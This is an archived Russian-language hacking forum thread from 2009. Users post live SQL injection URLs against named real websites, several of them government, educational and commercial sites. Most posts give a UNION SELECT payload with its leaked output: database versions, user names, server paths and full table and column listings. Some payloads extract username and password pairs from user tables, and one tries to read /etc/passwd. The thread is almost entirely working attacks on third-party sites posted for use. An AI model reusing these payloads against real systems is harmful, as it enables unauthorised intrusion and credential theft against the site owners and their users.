ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10151  
Старый 13.07.2009, 07:40
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

giant.md
Это кагбе самые крутые лесапеды в молдове
Код:
http://www.giant.md/news.php?id=-17%20UNION%20SELECT%20CONCAT_WS(0x3a,DATABASE(),USER(),VERSION()),2,3,4--
Код:
13404:13404@localhost:5.0.77
таблы (колонки)
Код:
cat_velo (id, category, type, year, razmer_rami, rama, vilka, z_perecl, p_perecl, manetki, shatuni, pedali, ruli, vinos, rulevaia_kolonka, ru4ki_tormoza, p_tormoz, z_tormoz, sedlo, podsedelinii_shtir, oboda, p_vtulka, z_vtulka, pokrishki, spitsi, karetka, tsepi, kasseta, kolvo_skorostei, exact_name, color, picture, description, price)
categories (id, name, text, picture, big_text, big_picture, width, type)
contact (id, name, email, topic, msg)
fish_config (id, name, value, description, code)
fish_feedback (id, name, email, msg, dat)
fish_labels (id, param, value, code)
fish_language (id, value, language)
fish_news (id, title, text, picture, active, dat, code)
fish_photoalbum (id, title_en, descr_en, title_md, descr_md, title_ru, descr_ru, folder, active)
fish_sections (id, value, name_en, name_ru, name_md, active)
fish_service (id, title, text, picture, price, dat, code, active)
fish_tips (id, text, picture, dat, code, active)
guest (id_msg, name, city, email, url, msg, answer, puttime, hide)
news (id, title, picture, preview, text, date, time)
pro_accessories (id, category, name, art_no, picture, price, descr)
proposals (id, title, picture, descr, date, active)
secret_agents (id, login, password)
service (id, name, value)
shimano_parts (id, category, name, art_no, picture, price, descr, bike_type, ride_type)
silver_djs (id, name, photo_small, photo_big, bday, contacts, about)
silver_news (id, title, pic_small, pic_big, preview, text, date, time)
silver_posters (id, title, text, from_date, to_date, added)
silver_progs (id, title, descr, djs)
silver_schedule (id, id_prog, weekday, begin, end)
stat_global (id, razdel, visits, month)
stat_razdel (id, id_user, razdel, dat)
stat_users (id, ip, sid, dat)
wp_comments (comment_ID, comment_post_ID, comment_author, comment_author_email, comment_author_url, comment_author_IP, comment_date, comment_date_gmt, comment_content, comment_karma, comment_approved, comment_agent, comment_type, comment_parent, user_id)
wp_links (link_id, link_url, link_name, link_image, link_target, link_category, link_description, link_visible, link_owner, link_rating, link_updated, link_rel, link_notes, link_rss)
wp_options (option_id, blog_id, option_name, option_value, autoload)
wp_postmeta (meta_id, post_id, meta_key, meta_value)
wp_posts (ID, post_author, post_date, post_date_gmt, post_content, post_title, post_category, post_excerpt, post_status, comment_status, ping_status, post_password, post_name, to_ping, pinged, post_modified, post_modified_gmt, post_content_filtered, post_parent, guid, menu_order, post_type, post_mime_type, comment_count)
wp_term_relationships (object_id, term_taxonomy_id, term_order)
wp_term_taxonomy (term_taxonomy_id, term_id, taxonomy, description, parent, count)
wp_terms (term_id, name, slug, term_group)
wp_usermeta (umeta_id, user_id, meta_key, meta_value)
wp_users (ID, user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name)

Последний раз редактировалось Ponchik; 13.07.2009 в 07:45..
 
Ответить с цитированием

  #10152  
Старый 13.07.2009, 13:57
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

гаф
Цитата:
http://www.vidol.gov/dol_news_detail.php?detail_id=38'+union+select+1,l oad_file('/etc/passwd'),3,4+limit+1,1/*
жаль,что мускуль на другом хосте..=)

version 5.0.45-log

Последний раз редактировалось $n@ke; 13.07.2009 в 13:59..
 
Ответить с цитированием

  #10153  
Старый 13.07.2009, 15:44
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

Код:
http://www.praguepubs.co.uk/pubs_details.php?id=-3+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+information_schema.tables--
5.0.77-community-logpubs_ppubspubs_prague@localhost
 
Ответить с цитированием

  #10154  
Старый 13.07.2009, 16:20
beerhack
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
Провел на форуме:
3395070

Репутация: 173
По умолчанию

blind, version: 5
Код:
http://www.perquimanscountync.gov/index.php?page=commissioners&id=6+and+substring(version(),1,1)=5--&mode=printminutes
 
Ответить с цитированием

  #10155  
Старый 13.07.2009, 22:09
rolex
Познающий
Регистрация: 07.04.2009
Сообщений: 40
Провел на форуме:
8945659

Репутация: 103
Отправить сообщение для rolex с помощью ICQ
По умолчанию

PR 5
Цитата:
http://www.stikom.edu/v8/main.php?act=lay&goto=jurnal_detil&id=-28+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3,4,5--
T74113_stikomedu:5.0.51a-24+lenny1:t74113_nuansajp@localhost

PR 5
Цитата:
http://www.ecodelaware.com/place.php?id=313+union+select+1,concat_ws(0x3a,use rname,password),3+from+Users--
---
Цитата:
http://knowyou.ru/send.php?id=-10908+union+select+1,concat_ws(0x3a,database(),ver sion(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17--
Цитата:
http://www.artafisha.ru/place.php?id=-15+union+select+1,2,3,4,5,concat_ws(0x3a,database( ),version(),user()),7--
Цитата:
http://www.gilishproekt.ru/Objects/place.php?id=-179+union+selecT+1,2,3,4,5,concat_ws(0x3a,database (),version(),user())--
Цитата:
http://a-sib.ru/hot.php?id=-68+union+select+1,2,3,4,concat_ws(0x3a,database(), version(),user()),6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23--
 
Ответить с цитированием

  #10156  
Старый 14.07.2009, 02:39
Amoura
Участник форума
Регистрация: 23.01.2008
Сообщений: 182
Провел на форуме:
2268999

Репутация: 410
Отправить сообщение для Amoura с помощью ICQ
По умолчанию

http://fanboys.dreamhosters.com/index.php?blog=-74+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8--&comic=327
 
Ответить с цитированием

  #10157  
Старый 14.07.2009, 04:59
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500

Репутация: 930


По умолчанию

PR5
www.hcjz.hr

Код:
http://www.hcjz.hr/clanak.php?id=-12521+union+select+concat_ws(0x3a,user(),version(),database(),11111111111111111111111)/*

ДБ: hcjz@asc203.t-com.hr:5.0.45:hcjz
Путь: /users1/hcjz/public_html/
Табличко: jos_users
 
Ответить с цитированием

  #10158  
Старый 14.07.2009, 05:04
+++AndreyDevil+++
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
Провел на форуме:
1311435

Репутация: 90
По умолчанию

http://www.washingtoninstitute.org/templateC05.php?CID=-2550'+union+select+1,2,3,4,5,version(),7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22--+

5.0.67-log
winep2_2@localhost
winep2_production
 
Ответить с цитированием

  #10159  
Старый 14.07.2009, 05:23
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500

Репутация: 930


По умолчанию

PR5
www.lakberendezes.hu

Код:
http://www.lakberendezes.hu/magazin/mutat.php?id=-462+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*

ДБ: 5.0.32-Debian_7etch5-log:lakber:lakberftp@localhost
Путь: /home/dv/users/lakberendezes/www/
Табличко: admin && users
 
Ответить с цитированием

  #10160  
Старый 14.07.2009, 10:17
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://www.bacchus.tv/index/wine2.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user())--

5.0.67:bacchus_bacchus:bacchus_bacchus@localhost

####################################
http://www.toddlevi.tv/gotw_display.php?id=-1'+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8/*

5.0.27:toddlevi:toddlevi@localhost

####################################
ТИЦ: 40
PR: 4

http://www.hypocrisy.tv/mediaplayer/videos.php?id=-1+union+select+concat_Ws(0x3a,user(),database(),ve rsion()),2,3,4,5,6,7,8,9--

penetralia@crenshaw.dreamhost.comenetralia:5.0.6 7-userstats-log

####################################
http://philmadelphia.tv/portfolio/motion.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user())--

4.1.25-Debian_mt1:db20241_kelly:db20241@64.13.232.43

####################################
Я ТОЖЕ УБИЛ КЕННИ

http://www.southpark-tv.com/episode.php?id=1+union+select+1,2,concat_Ws(0x3a,v ersion(),database(),user()),4,5,6,7,8,9,10,11--

5.0.68-log:southparasql:southparasql@10.0.65.22

tables:

Код:
punbb_censoring,sptv_temp,punbb_groups,wa_admin,punbb_reports,pmnl_archives,wa_forbidden_ext,punbb_subscriptions,pmnl_sub,wa_log_files,sptv_referer,punbb_config,videos,punbb_online,wa_auth_admin,punbb_search_cache,pmnl_config,wa_joined_files,punbb_topics,pmnl_temp,wa_session,sptv_referer_out,sptv_referer_site,punbb_forum_perms,wa_abo_liste,punbb_posts,wa_ban_list,punbb_search_matches,pmnl_email,wa_liste,punbb_users,punbb_bans,sptv_referer_toplist,punbb_forums,wa_abonnes,punbb_ranks,wa_config,punbb_search_words,pmnl_listsconfig,wa_log,ratings,punbb_categories
user_tables: punbb_users
Код:
http://www.southpark-tv.com/episode.php?id=1+union+select+1,2,group_concat(concat_Ws(0x3a,username,password)),4,5,6,7,8,9,10,11+from+punbb_users--

Последний раз редактировалось HAXTA4OK; 14.07.2009 в 11:04..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ